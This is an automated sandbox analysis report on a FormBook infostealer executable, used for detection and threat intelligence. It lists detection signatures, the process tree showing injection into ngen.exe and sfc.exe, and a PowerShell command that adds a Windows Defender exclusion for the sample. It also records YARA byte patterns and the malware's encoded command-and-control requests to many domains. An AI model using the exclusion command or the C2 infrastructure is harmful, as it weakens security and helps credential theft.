Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
NdYuOgHbM9.exe

Overview

General Information

Sample name:NdYuOgHbM9.exe
renamed because original name is a hash value
Original sample name:1bb742c209872385c5b456d066fccf141ab2405245953c135b36029a3dbd5bee.exe
Analysis ID:1438237
MD5:664eddacb00d2d58f85cdc2913a1680e
SHA1:3dfce1917291ff78513dba84e8ac715700d814d7
SHA256:1bb742c209872385c5b456d066fccf141ab2405245953c135b36029a3dbd5bee
Tags:exe
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected AntiVM3
Yara detected FormBook
Yara detected UAC Bypass using CMSTP
.NET source code references suspicious native API functions
Adds a directory exclusion to Windows Defender
Allocates memory in foreign processes
Disables UAC (registry)
Found direct / indirect Syscall (likely to bypass EDR)
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file does not import any functions
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • NdYuOgHbM9.exe (PID: 2060 cmdline: "C:\Users\user\Desktop\NdYuOgHbM9.exe" MD5: 664EDDACB00D2D58F85CDC2913A1680E)
    • conhost.exe (PID: 3548 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 1856 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\NdYuOgHbM9.exe" -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 5964 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 7404 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • notepad.exe (PID: 6608 cmdline: "C:\Windows\System32\notepad.exe" MD5: 27F71B12CB585541885A31BE22F61C83)
    • ngen.exe (PID: 7212 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe" MD5: 417D6EA61C097F8DF6FEF2A57F9692DF)
      • tyVvDSdgzXcAfzWUYqtqOHNMkF.exe (PID: 6044 cmdline: "C:\Program Files (x86)\sXZLxxxVCvpdQOMpmsJLTDHHUKeepOfvgbaNCsuUxLUHfDBqRMOvfXspILySfYOM\tyVvDSdgzXcAfzWUYqtqOHNMkF.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • sfc.exe (PID: 7660 cmdline: "C:\Windows\SysWOW64\sfc.exe" MD5: 4D2662964EF299131D049EC1278BE08B)
          • tyVvDSdgzXcAfzWUYqtqOHNMkF.exe (PID: 2132 cmdline: "C:\Program Files (x86)\sXZLxxxVCvpdQOMpmsJLTDHHUKeepOfvgbaNCsuUxLUHfDBqRMOvfXspILySfYOM\tyVvDSdgzXcAfzWUYqtqOHNMkF.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 7956 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
    • ngen.exe (PID: 7224 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe" MD5: 417D6EA61C097F8DF6FEF2A57F9692DF)
    • WerFault.exe (PID: 7296 cmdline: C:\Windows\system32\WerFault.exe -u -p 2060 -s 1572 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000C.00000002.4092649802.0000000002F30000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    0000000C.00000002.4092649802.0000000002F30000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x2a430:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x13aef:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    0000000C.00000002.4091718758.0000000002A80000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      0000000C.00000002.4091718758.0000000002A80000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x2a430:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x13aef:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      00000005.00000002.1847525772.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        Click to see the 14 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        5.2.ngen.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          5.2.ngen.exe.400000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x2d983:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x17042:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          5.2.ngen.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            5.2.ngen.exe.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
            • 0x2cb83:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
            • 0x16242:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\NdYuOgHbM9.exe" -Force, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\NdYuOgHbM9.exe" -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\NdYuOgHbM9.exe", ParentImage: C:\Users\user\Desktop\NdYuOgHbM9.exe, ParentProcessId: 2060, ParentProcessName: NdYuOgHbM9.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\NdYuOgHbM9.exe" -Force, ProcessId: 1856, ProcessName: powershell.exe
            Sigma detected: Powershell Defender Exclusion
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\NdYuOgHbM9.exe" -Force, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\NdYuOgHbM9.exe" -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\NdYuOgHbM9.exe", ParentImage: C:\Users\user\Desktop\NdYuOgHbM9.exe, ParentProcessId: 2060, ParentProcessName: NdYuOgHbM9.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\NdYuOgHbM9.exe" -Force, ProcessId: 1856, ProcessName: powershell.exe
            Sigma detected: Non Interactive PowerShell Process Spawned
            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\NdYuOgHbM9.exe" -Force, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\NdYuOgHbM9.exe" -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\NdYuOgHbM9.exe", ParentImage: C:\Users\user\Desktop\NdYuOgHbM9.exe, ParentProcessId: 2060, ParentProcessName: NdYuOgHbM9.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\NdYuOgHbM9.exe" -Force, ProcessId: 1856, ProcessName: powershell.exe

            Snort Signatures

            No Snort rule has matched

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Multi AV Scanner detection for submitted file
            Source: NdYuOgHbM9.exeReversingLabs: Detection: 42%
            Source: NdYuOgHbM9.exeVirustotal: Detection: 39%Perma Link
            Yara detected FormBook
            Source: Yara matchFile source: 5.2.ngen.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.ngen.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0000000C.00000002.4092649802.0000000002F30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000002.4091718758.0000000002A80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.1847525772.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000002.4092708936.0000000002F70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.1847829194.0000000005250000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000002.4094582069.0000000005760000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.1849163774.0000000005B50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.4092694801.00000000027B0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

            Exploits

            barindex
            Yara detected UAC Bypass using CMSTP
            Source: Yara matchFile source: 00000000.00000002.1804365853.000001EF3AD80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: NdYuOgHbM9.exe PID: 2060, type: MEMORYSTR
            Source: NdYuOgHbM9.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: mscorlib.pdbMZ source: WER943D.tmp.dmp.9.dr
            Source: Binary string: Microsoft.VisualBasic.ni.pdb source: WER943D.tmp.dmp.9.dr
            Source: Binary string: ngen.pdb source: sfc.exe, 0000000C.00000002.4093679938.000000000379C000.00000004.10000000.00040000.00000000.sdmp, sfc.exe, 0000000C.00000002.4091957268.0000000002CE4000.00000004.00000020.00020000.00000000.sdmp, tyVvDSdgzXcAfzWUYqtqOHNMkF.exe, 00000010.00000002.4093054650.000000000332C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000011.00000002.2130456184.000000001A6AC000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: System.pdb` source: WER943D.tmp.dmp.9.dr
            Source: Binary string: System.ni.pdbRSDS source: WER943D.tmp.dmp.9.dr
            Source: Binary string: System.Windows.Forms.ni.pdb source: WER943D.tmp.dmp.9.dr
            Source: Binary string: wntdll.pdbUGP source: ngen.exe, 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, sfc.exe, 0000000C.00000002.4092885357.0000000003170000.00000040.00001000.00020000.00000000.sdmp, sfc.exe, 0000000C.00000003.1849713302.0000000002FC0000.00000004.00000020.00020000.00000000.sdmp, sfc.exe, 0000000C.00000003.1847772604.0000000002E11000.00000004.00000020.00020000.00000000.sdmp, sfc.exe, 0000000C.00000002.4092885357.000000000330E000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: System.Drawing.ni.pdb source: WER943D.tmp.dmp.9.dr
            Source: Binary string: wntdll.pdb source: ngen.exe, ngen.exe, 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, sfc.exe, sfc.exe, 0000000C.00000002.4092885357.0000000003170000.00000040.00001000.00020000.00000000.sdmp, sfc.exe, 0000000C.00000003.1849713302.0000000002FC0000.00000004.00000020.00020000.00000000.sdmp, sfc.exe, 0000000C.00000003.1847772604.0000000002E11000.00000004.00000020.00020000.00000000.sdmp, sfc.exe, 0000000C.00000002.4092885357.000000000330E000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: sfc.pdbGCTL source: ngen.exe, 00000005.00000002.1847926282.00000000052A7000.00000004.00000020.00020000.00000000.sdmp, tyVvDSdgzXcAfzWUYqtqOHNMkF.exe, 0000000B.00000002.4092313230.0000000000D0E000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: mscorlib.ni.pdbRSDS7^3l source: WER943D.tmp.dmp.9.dr
            Source: Binary string: Microsoft.VisualBasic.ni.pdbRSDS& source: WER943D.tmp.dmp.9.dr
            Source: Binary string: System.Drawing.ni.pdbRSDS source: WER943D.tmp.dmp.9.dr
            Source: Binary string: System.pdb source: WER943D.tmp.dmp.9.dr
            Source: Binary string: Microsoft.VisualBasic.pdb source: WER943D.tmp.dmp.9.dr
            Source: Binary string: System.Core.ni.pdb source: WER943D.tmp.dmp.9.dr
            Source: Binary string: System.Windows.Forms.pdb source: WER943D.tmp.dmp.9.dr
            Source: Binary string: mscorlib.pdb source: WER943D.tmp.dmp.9.dr
            Source: Binary string: System.Windows.Forms.ni.pdbRSDS source: WER943D.tmp.dmp.9.dr
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: tyVvDSdgzXcAfzWUYqtqOHNMkF.exe, 0000000B.00000002.4092220680.0000000000B1E000.00000002.00000001.01000000.00000007.sdmp, tyVvDSdgzXcAfzWUYqtqOHNMkF.exe, 00000010.00000000.1911809244.0000000000B1E000.00000002.00000001.01000000.00000007.sdmp
            Source: Binary string: System.Drawing.pdb source: WER943D.tmp.dmp.9.dr
            Source: Binary string: mscorlib.ni.pdb source: WER943D.tmp.dmp.9.dr
            Source: Binary string: System.Core.pdb source: WER943D.tmp.dmp.9.dr
            Source: Binary string: sfc.pdb source: ngen.exe, 00000005.00000002.1847926282.00000000052A7000.00000004.00000020.00020000.00000000.sdmp, tyVvDSdgzXcAfzWUYqtqOHNMkF.exe, 0000000B.00000002.4092313230.0000000000D0E000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.ni.pdb source: WER943D.tmp.dmp.9.dr
            Source: Binary string: System.Core.ni.pdbRSDS source: WER943D.tmp.dmp.9.dr
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 12_2_02A9B800 FindFirstFileW,FindNextFileW,FindClose,12_2_02A9B800
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 4x nop then xor eax, eax12_2_02A89310
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 4x nop then pop edi12_2_02A8DAC6

            Networking

            barindex
            Performs DNS queries to domains with low reputation
            Source: DNS query: www.selectif.xyz
            Source: Joe Sandbox ViewIP Address: 62.149.128.40 62.149.128.40
            Source: Joe Sandbox ViewIP Address: 62.149.128.40 62.149.128.40
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /wu8v/?MdtlcTm=qj5NyNfN5WRMG7LniAROgWXsn6IsT6LjPGDeNkCQJp+HAmWfWpmvawkojhaRs1ogLHUlWi64I+vgy847wrcuJ4qAlI0oKyKfHw/MBjiNhxVy0+aqylgl+KA=&_X=ClAdyH4P7rA8z HTTP/1.1Host: www.fivetownsjcc.comAccept: */*Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Source: global trafficHTTP traffic detected: GET /wu8v/?MdtlcTm=o0dJzo0+KyysCnVnWeLPfMg3QtOn0MLLvJyzkFXrx5kDb0wpr6IDXytzlnmsuKpUsYAyYVSTQNkMYoOoJGqE4svaZh/Kq8S3fINkBD+7AXaHwSZaIMNjuTk=&_X=ClAdyH4P7rA8z HTTP/1.1Host: www.auetravel.kzAccept: */*Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Source: global trafficHTTP traffic detected: GET /wu8v/?MdtlcTm=kM+nKItVIOm9nxv083MKEZreo78kZmjvmDxFimKXw4NllaUxz2FZA/AxFfoR4c/c0+8T1IsyqFRuVBpkxsrpf3yFfXK/MNDg35iPLFQJ6s8K1nL5VHh3xe8=&_X=ClAdyH4P7rA8z HTTP/1.1Host: www.rltattoo.comAccept: */*Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Source: global trafficHTTP traffic detected: GET /wu8v/?MdtlcTm=h80XCq9V6N6s/txg4v4Fr8zmHDyj0DPil4lDzKoi2YAFaI23LxlO/y0x83EXcngteSl0Ff377sWS2kC2x8x2lEbqmRL/y9GY06LsNZ5NdSPXBqH5i7fNvls=&_X=ClAdyH4P7rA8z HTTP/1.1Host: www.wp-bits.onlineAccept: */*Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Source: global trafficHTTP traffic detected: GET /wu8v/?MdtlcTm=Yv1LGRM7Mjb9pBh1S0mxpOIYfAZ4/RDtaTGh+vP2adeGTIEJhl6Vpo3SkSZ8CVSt6h4P+QwQoy6FjmlMXS0oXaAW/UguTEMtgRYeILR3LZnXobcueVuNljQ=&_X=ClAdyH4P7rA8z HTTP/1.1Host: www.luckydomainz.shopAccept: */*Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Source: global trafficHTTP traffic detected: GET /wu8v/?MdtlcTm=ex7yQ3cnGheAaOrzEPkQGznKrbGAUhLo9VsCiDPBWJ5DUtj6oFWZ51Qu3bZCInwfBew3O0jwDr4r/fHP0DTqez+F51VR4AlcQUWQ9cVyxEHzKlzGRO1dndY=&_X=ClAdyH4P7rA8z HTTP/1.1Host: www.selectif.xyzAccept: */*Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Source: global trafficHTTP traffic detected: GET /wu8v/?MdtlcTm=ahy6va04TVDXAoc0SI77WnjdL1KdrpLWXquRcgE4oyJhjsOsnbVcxGfgc5U1b6nV6qG/kRi3KVZWLm+W9jeCK1XNsz8i7l9KE7k2fsNVpgLsbvF63CsRx24=&_X=ClAdyH4P7rA8z HTTP/1.1Host: www.yekobie.comAccept: */*Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Source: global trafficHTTP traffic detected: GET /wu8v/?MdtlcTm=G9rRy2qYQIDZeyI4LJY6JNX1SXnAoDrMeesi9cL1NNtjWs0X9VQENpz2e8f5yOztQaquY8UP2JEf8lkZo3Uj0uY+2wpGE8iKQtZfEVhbpqTk/gf9HUsxLCg=&_X=ClAdyH4P7rA8z HTTP/1.1Host: www.getgoodscrub.comAccept: */*Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Source: global trafficHTTP traffic detected: GET /wu8v/?MdtlcTm=1Nt7DtzRhGe3jz/JXOJL2dnBH6uFnvwsc8PmoPLhBuJURU+BFCU8Z1cZNkrKfh5y7OIVqmEx6Y55MHCBN9ekEPrBm2pelHdYOjg1gnpKSYR8wHJ7U/KLji4=&_X=ClAdyH4P7rA8z HTTP/1.1Host: www.xn--yzyp76d.comAccept: */*Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Source: global trafficHTTP traffic detected: GET /wu8v/?MdtlcTm=HNLEVoSmZQxFSmctMpTTd4dyTFjeIBcvYbInUpVYO5VLbn2V1MEgIHD38EU48JsuuCIVw/TFvn9kkkg/Sq9Xy2f3I5Wlm16rLCQIpVyEpLVAPUkeiuBH2KE=&_X=ClAdyH4P7rA8z HTTP/1.1Host: www.btpbox.comAccept: */*Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Source: global trafficHTTP traffic detected: GET /wu8v/?MdtlcTm=2Ekfj6jdIBk36xhcbV2ym43lHRKg6LV7IJvggRD/yKlDT5fLDaqmfwfg0kC4k4WA5tpgDGvB1m7jQvkf/ooPPLzV8n4D4xVHdcGXqhGJgd2fmMm1GJzEmqU=&_X=ClAdyH4P7rA8z HTTP/1.1Host: www.glissy.caAccept: */*Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Source: global trafficHTTP traffic detected: GET /wu8v/?MdtlcTm=jVsDngfN17jo53xCVVHLBYy1RtgDvNhrjbHy79NIDh3y3n8I8UoARbyDj0OI5nlukHb+wqYtKmURqZRRAHON04+Cmz5V6OWL/4It3e8ivry7nxqUmvN5lOs=&_X=ClAdyH4P7rA8z HTTP/1.1Host: www.insertcoen.comAccept: */*Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Source: global trafficHTTP traffic detected: GET /wu8v/?MdtlcTm=aNuP63JR+qvwCLW62wwN2gNqXDVrMTryMQjODMfsZKfQm/+YFqgnBKvcT5agT2uiD/O4mE7g0mgXxPpAo7asqKVpcckEa+9XwCnOtQUj6EFGuNumSA/i+x0=&_X=ClAdyH4P7rA8z HTTP/1.1Host: www.387mfyr.sbsAccept: */*Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Source: global trafficDNS traffic detected: DNS query: www.fivetownsjcc.com
            Source: global trafficDNS traffic detected: DNS query: www.auetravel.kz
            Source: global trafficDNS traffic detected: DNS query: www.rltattoo.com
            Source: global trafficDNS traffic detected: DNS query: www.wp-bits.online
            Source: global trafficDNS traffic detected: DNS query: www.luckydomainz.shop
            Source: global trafficDNS traffic detected: DNS query: www.selectif.xyz
            Source: global trafficDNS traffic detected: DNS query: www.yekobie.com
            Source: global trafficDNS traffic detected: DNS query: www.getgoodscrub.com
            Source: global trafficDNS traffic detected: DNS query: www.xn--yzyp76d.com
            Source: global trafficDNS traffic detected: DNS query: www.btpbox.com
            Source: global trafficDNS traffic detected: DNS query: www.glissy.ca
            Source: global trafficDNS traffic detected: DNS query: www.insertcoen.com
            Source: global trafficDNS traffic detected: DNS query: www.lebonergy.com
            Source: global trafficDNS traffic detected: DNS query: www.387mfyr.sbs
            Source: global trafficDNS traffic detected: DNS query: www.lm2ue.us
